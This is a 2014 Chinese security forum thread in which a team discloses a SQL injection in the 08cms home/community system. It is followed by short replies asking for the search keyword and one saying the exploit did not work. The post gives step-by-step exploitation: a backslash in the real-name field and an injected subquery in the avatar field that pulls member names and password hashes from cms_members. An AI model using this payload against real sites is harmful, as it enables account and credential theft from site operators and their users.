90_ 发表于 2014-9-5 18:33:47

08cms家园系统注入漏洞

##########################################
# Title :08cms家园系统注入漏洞
# Team :08 Security Team
# Author :08安全团队
# 首发 : 08安全团队
#######################################
这个漏洞在5月份已经审计出来了,现在将漏洞放出来。
注册一个账号 会员资料->基本资料查看表单得到自己的 MID
在真实姓名 填写 \
头像填写 ,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=231
真实姓名处即可查看


Dr.ls 发表于 2014-9-5 18:45:02

沙发?:lol

iverson 发表于 2014-9-5 19:45:05

话说关键字是啥????{:soso_e113:}

phantomer 发表于 2014-9-5 21:55:56

:P:P:P:P:P:P:P:P

邪恶 发表于 2014-9-5 23:21:49

本帖最后由 邪恶 于 2014-9-5 23:42 编辑

同关键字是啥》{:soso_e113:}

heihui 发表于 2014-9-6 11:43:20

碉堡了,赞一个

sea 发表于 2014-9-7 10:47:22

擎天小猪 发表于 2014-9-9 21:36:37

赞 一个如果代码给的更详细一点就好了

Mapleleaves 发表于 2014-9-15 09:17:41

我测试过,结果没反应

cuckocucko 发表于 2014-9-18 13:37:18

关键字是什么啊
页: [1] 2
查看完整版本: 08cms家园系统注入漏洞